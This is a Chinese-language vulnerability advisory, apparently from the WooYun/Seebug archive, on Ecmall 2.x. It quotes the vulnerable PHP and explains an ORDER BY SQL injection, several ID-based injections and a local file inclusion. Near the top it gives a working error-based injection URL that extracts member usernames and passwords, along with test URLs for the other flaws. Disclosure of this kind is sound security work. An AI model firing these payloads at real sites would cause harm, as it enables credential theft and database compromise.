Ecmall 2.x 多处安全漏洞汇总

### 简要描述： 一处通杀注入，同文件多处鸡肋注入，一处本地包含。累了不看了，体力活。。。 ### 详细说明： 通杀注入:http://localhost/ecmall/index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23 app/my_goods.app.php ``` function brand_list() { $_GET['store_id'] = $this->_store_id; $_GET['if_show'] = BRAND_PASSED; $con = array( array( 'field' => 'store_id', 'name' => 'store_id', 'equal' => '=', ), array( 'field' => 'if_show', 'name' => 'if_show', 'equal' => '=', 'assoc' => 'or', ),); $filtered = ''; if (!empty($_GET['brand_name']) || !empty($_GET['store'])) { $_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'"; $_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id; } if (isset($_GET['sort']) && isset($_GET['order'])) { $sort = strtolower(trim($_GET['sort'])); $order = strtolower(trim($_GET['order'])); if (!in_array($order,array('asc','desc'))) //依然只过滤了order,没有过滤sort { $sort = 'store_id'; $order = 'desc'; } } else { $sort = 'store_id'; $order = 'desc'; } $page = $this->_get_page(10); $conditions = $this->_get_query_conditions($con); $brand = $this->_brand_mod->find(array( 'conditions' => "(1=1 $conditions)" . $filtered, 'limit' => $page['limit'], 'order' => "$sort $order", //带入查询 order by参数注入. 'count' => true, )); $page['item_count'] = $this->_brand_mod->getCount(); ...... } ``` 本地包含漏洞:http://localhost/ecmall/index.php?app=my_payment&act=install&code=wooyun app/my_payment.app.php ``` function install() { $code = isset($_GET['code']) ? trim($_GET['code']) : 0; //没过滤 if (!$code) { echo Lang::get('no_such_payment'); return; } $model_payment =& m('payment'); $payment = $model_payment->get_builtin_info($code); //跟进 if (!$payment) { echo Lang::get('no_such_payment'); return; } $payment_info = $model_payment->get("store_id=" . $this->visitor->get('manage_store') . " AND payment_code='{$code}'"); if (!empty($payment_info)) { echo Lang::get('already_installed'); return; } ...... } includes/models/paymet.model.php <code> function get_builtin_info($code) { Lang::load(lang_file('payment/' . $code)); $payment_path = ROOT_PATH . '/includes/payments/' . $code . '/payment.info.php'; return include($payment_path); //包含之. } ``` 鸡肋注入:http://localhost/ecmall/index.php?app=seller_groupbuy&act=edit&id=1' http://localhost/ecmall/index.php?app=seller_groupbuy&act=xxxxxxxx&id=1' 需要开启团购活动 app/seller_groupbuy.app.php ``` function edit() { $id = empty($_GET['id']) ? 0 : $_GET['id']; //没过滤,下面还有很多类似的 if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) //带入查询 { $this->show_warning('Hacking Attempt'); return; } ...... } function drop() { $id = empty($_GET['id']) ? 0 : $_GET['id']; //下同 if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) //下同 { $this->show_warning('Hacking Attempt'); return; } ...... } function start() { $id = empty($_GET['id']) ? 0 : $_GET['id']; if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) { $this->show_warning('Hacking Attempt'); return; } ...... } function finished() { $id = empty($_GET['id']) ? 0 : $_GET['id']; if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) { $this->show_warning('Hacking Attempt'); return; } /* 团购信息 */ $group = $this->_groupbuy_mod->get(array( 'conditions' => 'group_id=' . $id, //同样带入查询 'fields' => 'group_name', )); ...... } function desc() { $id = empty($_GET['id']) ? 0 : $_GET['id']; if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) { $this->show_warning('Hacking Attempt'); return; } ...... /* 团购信息 */ $group = $this->_groupbuy_mod->get(array( 'conditions' => 'group_id=' . $id, 'fields' => 'group_desc', )); ...... } function cancel() { $id = empty($_GET['id']) ? 0 : $_GET['id']; if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) { $this->show_warning('Hacking Attempt'); return; } /* 团购信息 */ $group = $this->_groupbuy_mod->get(array( 'conditions' => 'group_id=' . $id, 'fields' => 'group_desc,group_name,owner_name', 'join' => 'belong_store' )); } function log() { $id = empty($_GET['id']) ? 0 : $_GET['id']; if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) { $this->show_warning('Hacking Attempt'); return; } $group = $this->_groupbuy_mod->get(array( 'conditions' => 'group_id=' . $id, 'fields' => 'group_desc, group_name, goods_id', )); } ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201309/28234646dde0a3b438bd0f4df0565ce02a521a5a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/28234646dde0a3b438bd0f4df0565ce02a521a5a.jpg) [<img src="https://images.seebug.org/upload/201309/282346331e2ba656603096958b192e953fd71f08.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/282346331e2ba656603096958b192e953fd71f08.jpg) [<img src="https://images.seebug.org/upload/201309/28234623c8f9c2548fa624a8be5e380502b3f53a.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/28234623c8f9c2548fa624a8be5e380502b3f53a.jpg) [<img src="https://images.seebug.org/upload/201309/282346138784b3e845799bb68e28243e590238d4.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/282346138784b3e845799bb68e28243e590238d4.jpg)